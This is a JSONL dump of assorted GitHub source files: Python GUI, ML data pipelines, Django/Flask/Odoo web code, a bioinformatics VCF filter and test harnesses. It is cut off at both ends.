text=\"Файл:\")\r\nfilename.pack(side=LEFT, anchor=W)\r\ne = Entry(top_frame, width=67)\r\ne.pack(side=LEFT)\r\ne.focus()\r\ne.bind(\"\", call_get_pgm)\r\n\r\n#Creates the popup menu with an option to exit the program\r\npopup_menu = Menu(root, tearoff=0)\r\npopup_menu.add_command(label=\"Exit\", command=root.destroy)\r\n\r\n#Creating the images for the buttons\r\nimg = ImageTk.PhotoImage(Image.open(\"img\\\\pgm.jpg\"))\r\nimg1 = PhotoImage(file = \"img\\\\file.png\")\r\nimg2 = PhotoImage(file =\"img\\\\display.png\")\r\nbackground = Label(bottom_frame,image=img)\r\nbackground.pack(side=TOP)\r\n\r\nstatus_text = Label(bottom_frame, text=\"статус:\", bd=1, relief=SUNKEN)\r\nstatus_text.pack(side=LEFT)\r\n\r\nstatus = Label(bottom_frame, text=\"Изчакване\", bd=1, relief=SUNKEN, anchor=W)\r\nstatus.pack(side=BOTTOM, fill=X)\r\n\r\nroot.bind(\"\", popup)\r\n\r\nget_file_button = Button(top_frame, image=img1, text=\"Отвори\", command=get_pgm_data, state=ACTIVE, compound=\"left\")\r\nget_file_button.pack(side=RIGHT)\r\n\r\nopen_file = Button(top_frame, image=img2, text= \"Покажи\", command=open_original_pgm, state=DISABLED, compound=\"left\")\r\nopen_file.pack(side=LEFT)\r\n\r\n#Centering of the main window according to screen resolution\r\nroot.withdraw()\r\nroot.update_idletasks()\r\nx = (root.winfo_screenwidth() - root.winfo_reqwidth()) / 2\r\ny = (root.winfo_screenheight() - root.winfo_reqheight()) / 2\r\nroot.geometry(\"+%d+%d\" % (x, y))\r\nroot.deiconify()\r\n\r\nroot.mainloop()\r\n","repo_name":"mazirah/PGM-Read-Modify","sub_path":"pgm read&modify.py","file_name":"pgm read&modify.py","file_ext":"py","file_size_in_byte":9202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26727665845","text":"\"\"\"Datasets utilities.\"\"\"\n\nfrom __future__ import annotations\n\nimport albumentations\nimport numpy as np\nimport tensorflow as tf\n\nfrom pathlib import PurePath\nfrom rasterio.io import MemoryFile\n\n\ndef augment_image_dataset(dataset: tf.data.Dataset,\n transforms: albumentations.Compose,\n augment_labels: bool = False) -> tf.data.Dataset:\n \"\"\"Augments a non-batched dataset using the given transforms.\"\"\"\n\n def _augment(image, label):\n if augment_labels:\n data = {\"image\": image, \"mask\": label}\n augmented = transforms(**data)\n return augmented[\"image\"], augmented[\"mask\"]\n else:\n data = {\"image\": image}\n augmented = transforms(**data)\n return augmented[\"image\"], label\n\n def _augment_tensors(image_tensor, label_tensor):\n return tf.numpy_function(func=_augment,\n inp=[image_tensor, label_tensor],\n Tout=[image_tensor.dtype, label_tensor.dtype])\n\n return dataset.map(_augment_tensors,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=True)\n\n\ndef tfrecords_as_geospatial_dataset(\n file_pattern: PurePath = None,\n batch_size: int = 1,\n repeat: bool = False,\n shuffle_buffer_size: int = 0,\n prefetch_buffer_size: int = tf.data.AUTOTUNE,\n transforms: albumentations.Compose = None,\n tfr_channel_keys: list[str] = None,\n tfr_channel_rewrite_map: dict[str, tuple[int, int]] = None,\n tfr_label_key: str = \"label\") -> tf.data.Dataset:\n \"\"\"Builds a geospatial raster dataset from TFRecords.\"\"\"\n\n if not file_pattern:\n raise ValueError(\"Must provide a non-empty file pattern.\")\n if not tfr_channel_keys:\n raise ValueError(\"Must provide a non-empty list of channel keys.\")\n\n shuffle = (shuffle_buffer_size > 0)\n deterministic = (not shuffle)\n\n if tfr_channel_rewrite_map:\n channel_rewrite_map = {\n tfr_channel_keys.index(k): v\n for k, v in tfr_channel_rewrite_map.items()\n }\n else:\n channel_rewrite_map = {}\n\n def _parse_example(serialized):\n \"\"\"Parses a serialized tf.train.Example into an (image, label) tuple.\"\"\"\n # pylint: disable=no-value-for-parameter\n\n all_keys = tfr_channel_keys + [tfr_label_key]\n example = tf.io.parse_example(\n serialized,\n {key: tf.io.FixedLenFeature([], tf.string) for key in all_keys})\n\n def _build_image_from_channels(*channels_data):\n img = []\n for idx, data in enumerate(channels_data):\n with MemoryFile(data) as memfile:\n with memfile.open() as f:\n channel = f.read(1)\n if idx in channel_rewrite_map:\n v_from, v_to = channel_rewrite_map[idx]\n channel[channel == v_from] = v_to\n img.append(channel)\n img = np.stack(img, axis=-1)\n return img\n\n img = tf.numpy_function(\n func=_build_image_from_channels,\n inp=[example[key] for key in tfr_channel_keys], # type: ignore\n Tout=tf.float32)\n\n def _read_label(data):\n with MemoryFile(data) as memfile:\n with memfile.open() as f:\n label = f.read(1)\n return np.expand_dims(label, axis=-1)\n\n label = tf.numpy_function(func=_read_label,\n inp=[example[tfr_label_key]],\n Tout=tf.uint8)\n\n return img, label\n\n ds = tf.data.TFRecordDataset.list_files(str(file_pattern), shuffle=shuffle)\n ds = ds.interleave(tf.data.TFRecordDataset,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=deterministic)\n if repeat:\n ds = ds.repeat()\n if shuffle:\n ds = ds.shuffle(buffer_size=shuffle_buffer_size)\n ds = ds.map(_parse_example,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=deterministic)\n\n if transforms:\n ds = augment_image_dataset(ds,\n transforms=transforms,\n augment_labels=True)\n\n options = tf.data.Options()\n options.experimental_distribute.auto_shard_policy = \\\n tf.data.experimental.AutoShardPolicy.DATA\n ds = ds.with_options(options)\n ds = ds.batch(batch_size=batch_size,\n drop_remainder=True,\n num_parallel_calls=tf.data.AUTOTUNE,\n deterministic=deterministic)\n\n ds = ds.prefetch(prefetch_buffer_size)\n return ds\n","repo_name":"stefanistrate/drivendata-stac-overflow","sub_path":"stac_overflow/utils/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31320706422","text":"from odoo import http\nfrom odoo.addons.website_sale.controllers.main import WebsiteSale\nfrom odoo.http import request\n\n\nclass WebsiteSaleFrogblue(WebsiteSale):\n\n @http.route(['/shop/print'], type='http', auth=\"public\", website=True, sitemap=False)\n def print_saleorder(self, **kwargs):\n res = super(WebsiteSaleFrogblue, self).print_saleorder()\n sale_order_id = request.session.get('sale_last_order_id')\n if sale_order_id:\n pdf, _ = request.env.ref('frogblue_reports.report_frogblue_sale_order').sudo().render_qweb_pdf([sale_order_id])\n pdfhttpheaders = [('Content-Type', 'application/pdf'), ('Content-Length', u'%s' % len(pdf))]\n return request.make_response(pdf, headers=pdfhttpheaders)\n else:\n return res\n","repo_name":"liaohanzhen/custom_14","sub_path":"frogblue/frogblue_reports/controllers/website_sale/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30138300607","text":"\"\"\"\r\n\n\nCreate a function that, given a **string** with at least **three characters**\n, returns an array of its:\n\n 1. Length.\n 2. First character.\n 3. Last character.\n 4. Middle character, if the string has an odd number of characters. Middle TWO characters, if the string has an even number of characters.\n 5. Index of the second occurrence of the second character in the format **\"@ index #\"** and **\"not found\"** if the second character doesn't occur again.\n\n### Examples\n\n all_about_strings(\"LASA\") ➞ [4, \"L\", \"A\", \"AS\", \"@ index 3\"]\n \n all_about_strings(\"Computer\") ➞ [8, \"C\", \"r\", \"pu\", \"not found\"]\n \n all_about_strings(\"Science\") ➞ [7, \"S\", \"e\", \"e\", \"@ index 5\"]\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef all_about_strings(txt):\n newlist = []\n newlist.append(len(txt))\n newlist.append(txt[0])\n newlist.append(txt[-1])\n if len(txt) % 2 != 0:\n middle = len(txt) // 2\n newlist.append(txt[middle])\n else:\n middle = len(txt) // 2\n to_add = txt[middle-1] + txt[middle]\n newlist.append(to_add)\n temp = txt[1]\n if txt.count(temp) == 1:\n newlist.append('not found')\n return newlist\n else:\n txt = txt[0:1] + '$' + txt[2:]\n first_index = txt.index(temp)\n newlist.append('@ index {}'.format(first_index))\n return newlist\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"pEozhEet5c8aFJdso_24.py","file_name":"pEozhEet5c8aFJdso_24.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8776967750","text":"from flask import flask, render_template \nfrom datetime import date\n\n\napp = flask(__name__)\n\n@app.route('/')\ndef show_nasa_pic():\n\ttoday = str(date.today())\n\tresponce = request.get('')\n\tdata= respond\t\n\n\n\nif __name__ =='__main__':\n\tapp.run(debug = True, host='127.0.0.1')\n","repo_name":"clayheart/teamedge-flask-projects","sub_path":"hello_flash/templates/APP.PY","file_name":"APP.PY","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70530520412","text":"############\n## INIT ##\n############\n\nfrom __future__ import print_function\nimport sys, tabix, time, re\n\nprog_name = sys.argv[0].split('/')[-1]\nif len(sys.argv) == 3:\n in_vcf = sys.argv[1]\n in_db = sys.argv[2] # bed.gz\n print(\"[%s] %s run initiated.\" % (time.ctime(), prog_name), file=sys.stderr)\nelse:\n sys.exit(\"\\nUsage: python %s \\n\" % prog_name)\n# fi\n\n\n## Module\ndef has_indel(ref, alts):\n flag_has_indel = False\n ref_len = len(ref)\n\n for alt in alts:\n if ref_len == len(alt) == 1:\n continue\n else:\n flag_has_indel = True\n # fi\n # for end \n return flag_has_indel\n# fed\n\n# Init tabix\ndb = tabix.open(in_db)\n\n# Proc VCF\nfor line in open(in_vcf, \"r\"):\n if line.startswith('#'):\n print(line.strip())\n continue\n field = line.strip().split('\\t')\n chrom = field[0]\n chrom_id = chrom.replace(\"chr\", '')\n chrom_id = 'M' if chrom_id == \"MT\" else chrom_id\n one_pos = int(field[1])\n chr_pos = \"%s:%s\" % (chrom_id, one_pos)\n ref = field[3]\n alts = field[4].split(',')\n query_db = \"chr%s:%s-%s\" % (chrom_id, one_pos, one_pos)\n flag_has_indel = has_indel(ref, alts)\n if not flag_has_indel: # if var has no indel\n print(line.strip())\n continue\n\n try:\n results = db.querys(query_db) # send query\n iter_cnt = sum(1 for _ in results)\n except tabix.TabixError:\n print(line.strip())\n continue\n\n # If at least 1 STR present\n if iter_cnt > 0:\n continue\n elif iter_cnt == 0:\n print(line.strip())\n continue\n else:\n sys.exit(\"ERROR: iter_cnt = %s\" % iter_cnt)\n# for line end\n","repo_name":"soymintc/rainbow","sub_path":"scripts/dbflt_str.py","file_name":"dbflt_str.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"36758840014","text":"import sklearn as sk\nfrom sklearn import datasets as ds\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\n\ntrainPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\TrainingDataset\"\ntestPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\TestingDataset\"\n\ngradeTrain = ds.load_files(trainPath,load_content = True,encoding = 'utf-8')\ngradeTest = ds.load_files(testPath,load_content= True,encoding = 'utf-8')\ngrade3CertainPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\Grade-Certain\\Grade3-Certain.txt\"\ngrade4CertainPath = \"C:\\\\Users\\Facebook\\Desktop\\Fred Hutch Internship\\ClinicalNotesReader\\Grade-Certain\\Grade4-Certain.txt\"\ngrade3CertainList = []\ngrade4CertainList = []\n\n#['Grade 1 or 2', 'Grade 3', 'Grade 4', 'Non-Existent'] - target_names\n# CountVectorizer- Turn text in matrix of token counts\n# Tfidf - Calculate term frequency times inverse document frequency\n\n\n'''Create and train a classifier'''\ndef trainClf():\n global clf\n # Pipeline to quickly train classifier\n clf = Pipeline([('vect',CountVectorizer()),\n ('tfidf',TfidfTransformer()),\n ('clf',MultinomialNB())])\n\n clf = clf.fit(gradeTrain['data'],gradeTrain['target'])\n\n\n'''Predict on Test Data set'''\ndef predictTest():\n predicted = clf.predict(gradeTest['data'])\n certain = checkCertain(gradeTest['data'])\n for change in certain:\n predicted[change[0]] = change[1]\n print(\"TOTAL ACCURACY: \" + str(accuracy_score(gradeTest['target'],predicted)))\n for x in range(len(predicted)):\n index = gradeTest['target'][x]\n pIndex = predicted[x]\n print(gradeTest['data'][x] + \"| ACTUAL:\" +\n gradeTest['target_names'][index] + \" PREDICTED: \"\n + gradeTest['target_names'][pIndex])\n\n'''Loads/Maps the text files containing the words which determines the grade'''\ndef loadCertain(path,list):\n rObject = open(path, 'r')\n for line in rObject:\n line = line.strip()\n line = line.lower()\n list.append(line)\n\n'''Checks if the data passed in contains terms that are specific to a certain grade'''\ndef checkCertain(data):\n certain = []\n #certain indicator - (index,grade)\n for x in range(len(data)):\n temp = ()\n for indicator in grade3CertainList:\n if indicator in data[x]:\n temp = (x,1)\n for i in grade4CertainList:\n if i in data[x]:\n print(i)\n temp = (x,2)\n if temp:\n certain.append(temp)\n return certain\n\nloadCertain(grade3CertainPath,grade3CertainList)\nloadCertain(grade4CertainPath,grade4CertainList)\n\ntrainClf()\npredictTest()","repo_name":"Unagifan/GITGrader","sub_path":"GITGradeClassifier.py","file_name":"GITGradeClassifier.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23460529031","text":"from django.contrib.auth import authenticate\nfrom django.contrib.auth.models import User\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework_simplejwt.authentication import JWTAuthentication\nfrom rest_framework import generics, filters, status\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework_simplejwt.tokens import RefreshToken\nfrom rest_framework import permissions\nfrom rest_framework.decorators import api_view\nfrom rest_framework.generics import (\n CreateAPIView,\n RetrieveUpdateDestroyAPIView, ListAPIView,\n)\n\nfrom user.models import User\nfrom user.serializers import (\n UserSerializer,\n UserLoginSerializer,\n UserLogoutSerializer,\n UserProfileSerializer,\n FollowingSerializer,\n)\n\n\n@api_view([\"GET\"])\ndef user_endpoints(request):\n base_url = request.build_absolute_uri(\"/api/user/\")\n endpoints = {\n \"Create user\": f\"{base_url}register/\",\n \"Login\": f\"{base_url}login/\",\n \"Logout\": f\"{base_url}logout/\",\n \"Token\": f\"{base_url}token/\",\n \"Refresh Token\": f\"{base_url}token/refresh/\",\n \"Verify Token\": f\"{base_url}token/verify/\",\n \"My profile\": f\"{base_url}me/\",\n \"Search Users\": f\"{base_url}users/search/\",\n \"Update/Delete User Profiles\": f\"{base_url}profiles//\",\n \"Following Users\": f\"{base_url}following/\",\n \"User's Followers\": f\"{base_url}/followers/\",\n \"My profiles\": f\"{base_url}profile/\",\n \"User Profiles\": f\"{base_url}all/\",\n \"User's Profile\": f\"{base_url}/\",\n }\n return Response(endpoints)\n\n\nclass IsOwnerOrReadOnly(permissions.BasePermission):\n def has_object_permission(self, request, view, obj):\n if request.method in permissions.SAFE_METHODS:\n return True\n return obj.user == request.user\n\n\nclass CreateUserView(CreateAPIView):\n serializer_class = UserSerializer\n\n\nclass UserLoginView(APIView):\n serializer_class = UserLoginSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n if serializer.is_valid():\n email = serializer.validated_data[\"email\"]\n password = serializer.validated_data[\"password\"]\n user = authenticate(request, email=email, password=password)\n if user is not None:\n return Response(\n {\"message\": \"Login successful.\"}, status=status.HTTP_200_OK\n )\n else:\n return Response(\n {\"message\": \"Invalid email or password.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserLogoutView(APIView):\n serializer_class = UserLogoutSerializer\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n refresh_token = request.data.get(\n \"refresh\",\n )\n # Blacklist the refresh token to invalidate it\n try:\n token = RefreshToken(refresh_token)\n token.blacklist()\n return Response({\"detail\": \"Logout successful\"})\n except Exception:\n return Response({\"detail\": \"Invalid token\"}, status=401)\n\n\nclass ManageUserView(generics.RetrieveUpdateAPIView):\n serializer_class = UserSerializer\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n\n def get_object(self):\n return self.request.user\n\n\nclass UserProfileUpdateDeleteView(RetrieveUpdateDestroyAPIView):\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n\n queryset = User.objects.all()\n serializer_class = UserProfileSerializer\n lookup_field = \"pk\"\n\n def get(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n def put(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, *args, **kwargs):\n instance = self.get_object()\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass UserDetailView(generics.RetrieveAPIView):\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n serializer_class = UserProfileSerializer\n\n def get(self, request, pk):\n user = User.objects.get(pk=pk)\n serializer = self.serializer_class(user, context={\"request\": request})\n data = serializer.data\n return Response(data)\n\n def get_followers(self, request, pk):\n user = User.objects.get(pk=pk)\n followers = user.followers.all()\n serializer = self.serializer_class(followers, many=True, context={\"request\": request})\n data = serializer.data\n return Response(data)\n\n def post(self, request, pk):\n user = User.objects.get(pk=pk)\n request_user = request.user\n if request_user.is_authenticated:\n if user.followers.filter(pk=request_user.pk).exists():\n user.followers.remove(request_user)\n return Response(\n {\n \"username\": user.username,\n \"profile_picture\": user.profile_picture.url\n if user.profile_picture\n else None,\n \"followed\": False,\n },\n status=status.HTTP_200_OK,\n )\n else:\n user.followers.add(request_user)\n return Response(\n {\n \"username\": user.username,\n \"profile_picture\": user.profile_picture.url\n if user.profile_picture\n else None,\n \"followed\": True,\n },\n status=status.HTTP_200_OK,\n )\n return Response(\n {\"detail\": \"Authentication required\"}, status=status.HTTP_401_UNAUTHORIZED\n )\n\n\nclass UserProfileListAPIView(APIView):\n def get(self, request):\n profiles = User.objects.all()\n serializer = UserSerializer(profiles, many=True)\n return Response(serializer.data)\n\n\nclass UserSearchView(generics.ListAPIView):\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n serializer_class = UserSerializer\n queryset = User.objects.all()\n filter_backends = [filters.SearchFilter]\n search_fields = [\"username\", \"email\"]\n\n\nclass FollowingUserListAPIView(ListAPIView):\n serializer_class = FollowingSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user = self.request.user\n return user.following.all()\n\nclass FollowerListView(ListAPIView):\n serializer_class = UserSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user = self.request.user\n return user.followers.all()\n","repo_name":"avkpol/social-media-API","sub_path":"user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1613602569","text":"#!/usr/bin/python3\nimport sys\n#print(sys.argv)\nin1 = input('Etner 1-st interface in the bundle: ')\nin2 = input('Enter 2-nd interface in the bundle: ')\nae = input('Enter ae number')\ninterface_template = [ 'set interface {int1} gigether-options 802.3ad ae{ae}',\n\t\t\t'set interface {int2} gigether-options 802.3ad ae{ae}',\n\t\t\t'set interface ae{ae} agragated-ether-options lacp periodic fast']\n#print(in1, in2, ae)\t \nprint('\\n'.join(interface_template).format(int1=in1, int2=in2, ae=ae))\n","repo_name":"arturiuslim/arthur_storage","sub_path":"arthurs_scripts/jum_ae_int.py","file_name":"jum_ae_int.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25199218689","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/5/5 上午10:19\n# @Author : Chenzd\n# @Site : 读取配置文件\n# @File : readConfig.py\n# @Software: PyCharm\n# @company: LEELEN\nimport configparser\nimport os\nimport filePath\nfrom public.configLog import Logger\nlogger = Logger(logger='public.readConfig.ReadConfig').getlog()\n\nconfig_file = os.path.join(filePath.config_path, 'config.ini')\n\nclass ReadConfig:\n\n def __init__(self):\n self.configParser = configparser.ConfigParser()\n self.configParser.read(config_file)\n\n def get_email(self,name):\n value = self.configParser.get('email',name)\n logger.info('读取config.ini文件 email:[%s:%s]'%(name, value))\n return value\n\nif __name__ == '__main__':\n a = ReadConfig().get_email('mail_user')\n print(a)","repo_name":"chales20/ios_luxdomo","sub_path":"public/readConfig.py","file_name":"readConfig.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30955299518","text":"import shlex\nimport subprocess\n\ndef execute_cmd(args, useBash = False, printOutput=True):\n \"\"\"\n Execute the external command and get its exitcode, stdout are yield.\n \"\"\"\n\n if useBash:\n args = 'bash.exe -c \"' + ' '.join(args) + '\"'\n \n print('running: ' + str(args))\n\n if printOutput:\n popen = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)\n for stdout_line in iter(popen.stdout.readline, ''):\n print(stdout_line, end='')\n\n popen.stdout.close()\n else:\n popen = subprocess.Popen(args)\n\n return_code = popen.wait()\n if return_code:\n raise subprocess.CalledProcessError(return_code, args)\n\n","repo_name":"c-esswein/gemsearch","sub_path":"gemsearch/utils/proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38587622983","text":"import numpy as np\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\n\ndata = np.mat([[1, 200, 105, 3, False],\n [2, 165, 80, 2, False],\n [3, 184.5, 120, 2, False],\n [4, 116, 70.8, 1, False],\n [5, 270, 150, 4, True]])\n\ncoll = []\nfor row in data:\n coll.append(row[0, 1])\n\nstats.probplot(coll, plot=plt)\nplt.show()\n","repo_name":"Inspring6/OpenCV_TensorFlow","sub_path":"ch03/program3-4.py","file_name":"program3-4.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36389812368","text":"import os\nfrom unittest import TestCase\nimport subprocess\n\n\nclass LocustTestCase(TestCase):\n\n def test(self):\n path = os.path.abspath(\n os.path.join(\n os.path.dirname(__file__),\n 'django/project/db.sqlite3'\n )\n )\n subprocess.call(['cp', os.devnull, path])\n subprocess.Popen(\n ['python tests/django/project/manage.py migrate && '\n 'python tests/django/project/manage.py runserver'],\n shell=True\n )\n popen = subprocess.Popen([\n 'locust', '-f', 'tests/_locust.py', '--clients=2',\n '--no-web', '--host=http://127.0.0.1:8000'\n ])\n pid = popen.pid\n subprocess.call([\n '''\n sleep 20 && kill {pid}\n '''.format(\n pid=pid\n )\n ], shell=True)\n popen.wait()\n subprocess.call([\n '''\n ps aux |grep manage | grep runserver |\n awk {{'print $2'}} | xargs kill\n '''\n ], shell=True)\n self.assertEquals(popen.returncode, 0)\n","repo_name":"sergeyglazyrindev/gherkin-locust","sub_path":"tests/test_adapters.py","file_name":"test_adapters.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41236648900","text":"\"\"\" dl_model_eval.py: \n \n This program is used to separately evaluate the model with the eval dataset.\n \n A CSV containing the eval dataset is iterated through and the model is used to predict the label of each Tweet.\n\"\"\"\n\n__author__ = \"Breydon Verryt-Reid\"\n__date__ = \"28 Sep 22\"\n__version__ = 1.5\n__status__ = \"Complete\"\n__notes__ = \"This program is intended to be run as a standalone program\"\n\n# importing required libraries\n# !pip install transformers\nfrom transformers import pipeline, AutoModelForSequenceClassification\nimport csv\n\ndef dlmodelmain(input):\n \"\"\" This function contains the model which takes in a string or list of strings and performs an analysis of that text\n\n ** Parameters **\n input: a str containing the body of a Tweet (after being preprocessed)\n\n ** Returns **\n N/A\n \"\"\"\n model = AutoModelForSequenceClassification.from_pretrained(\"bvrau/covid-twitter-bert-v2-struth\", num_labels=2) # this is the model that was trained\n pipe = pipeline(\"text-classification\", model=model, tokenizer=\"bvrau/covid-twitter-bert-v2-struth\", top_k=2, function_to_apply=\"sigmoid\") # this is the pipeline that is used to make predictions\n result = pipe(input) # this is the prediction\n print(result,\"\\n\") # prints the prediction result\n \n # this section of code is used to return the predicted label and score - not in use\n # resultdict = result[0]\n # label = resultdict['label']\n # score = resultdict['score']\n # print(\"** Results **\")\n # print(\"Determination: \"+label)\n # print(\"Certainty: \"+str(score)) \n # return label, score\n\ndef dataloader(file):\n \"\"\" This function loads the data from the csv file and lists item by item the expected output.\n The data is then passed to the dlmodelmain function for pipeline prediction.\n The results are then compared to the expected output and the accuracy is calculated.\n\n ** Parameters **\n N/A\n\n ** Returns **\n N/A\n \"\"\" \n test = file\n with open(test, 'r') as csvfile: # opens the csv file\n datareader = csv.reader(csvfile, delimiter=',') # reads the csv file\n next(datareader) # skips the first row of the csv file (headers)\n for row in datareader: # iterates through each row of the csv file\n if row[0] == \"0\": \n actual = \"real\" # sets the expected output to real\n elif row[0] == \"1\":\n actual = \"fake\" # sets the expected output to fake\n print(\"This should be classified: \", actual) # prints the expected output\n dlmodelmain(row[1]) # passes the Tweet body to the dlmodelmain function for prediction\n\ndataloader(\"preproc_data_eval.csv\")","repo_name":"Struth-Social-UNSW/ITProject2","sub_path":"Backend/deep-learn-algo/train_test/dl_model_eval.py","file_name":"dl_model_eval.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30792608133","text":"import sys\nimport time\nimport subprocess\nfrom subprocess import PIPE, Popen\nfrom threading import Thread\nfrom queue import Queue, Empty # python 3.x\n\n# Django Thread\ndef start_django():\n subprocess.call(['python', './servers/manage.py', 'runserver', '0.0.0.0:8000'])\n\ndjangoThread = Thread(target=start_django, name=\"Django Thread\")\ndjangoThread.start()\n\n\ntime.sleep(2)\n\ndef start_clients():\n subprocess.call(['python', './clients.py'])\n\nclientsThread = Thread(target=start_clients, name=\"Clients Thread\")\nclientsThread.start()\n\n\ntime.sleep(3)\n\ndef start_simulation():\n subprocess.call(['python', './__main__.py'])\n\nsimulationThread = Thread(target=start_simulation, name=\"Simulation Thread\")\nsimulationThread.start()\n\n\n","repo_name":"imran1161/Access-Control-Framework","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70161342172","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('profiles', '0003_auto_20170705_0313'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='profiles',\n name='locations',\n field=models.CharField(blank=True, max_length=120, default='My Location Default', null=True),\n ),\n ]\n","repo_name":"csp5096/python3.5-django-ecommerce","sub_path":"src/profiles/migrations/0004_auto_20170705_0316.py","file_name":"0004_auto_20170705_0316.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27905926095","text":"from geopy.geocoders import Nominatim\nfrom flask import *\nimport requests\nimport json\nimport getweather\nimport threading\nimport time\nimport schedule\n\napp = Flask(__name__)\n\n# calling the nominatim tool\ngeoLoc = Nominatim(user_agent=\"GetLoc\")\n \n\nweather_api_url = \"https://opendata.cwa.gov.tw/api/v1/rest/datastore/F-C0032-001\"\n#\"latitude\":\"25.0575931\",\"longitude\":\"121.3625344\"\n@app.route('/get_weather', methods=['GET'])\ndef get_weather():\n data = request.get_json()\n authorization = data.get('Authorization')\n latitude = data.get('latitude')\n longitude = data.get('longitude')\n # location = data.get('locationName')\n locname = geoLoc.reverse(\"25.0575931, 121.3625344\")\n address_parts = locname.address.split(\", \")\n if len(address_parts) >= 4:\n location = address_parts[-3]#縣市\n district = address_parts[-4]#區域\n print(\"縣市:\", location)\n print(\"區域:\", district)\n else:\n print(\"地址訊息不足\")\n print(locname.address)\n if not authorization or not latitude or not longitude:\n return jsonify({'error': '前端缺少參數'})\n\n params = {\n 'Authorization': authorization,\n 'locationName': location,\n 'format': 'JSON', \n }\n try:\n response = requests.get(weather_api_url, params=params)\n response.raise_for_status() \n\n try:\n weather_data = response.json()\n return jsonify(weather_data)\n except json.JSONDecodeError as e:\n return jsonify({'error': 'API無法解析為json'})\n\n except requests.exceptions.RequestException as e:\n return jsonify({'error': 'API請求失敗'})\n\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n\ndef sendmsg(name,content):\n 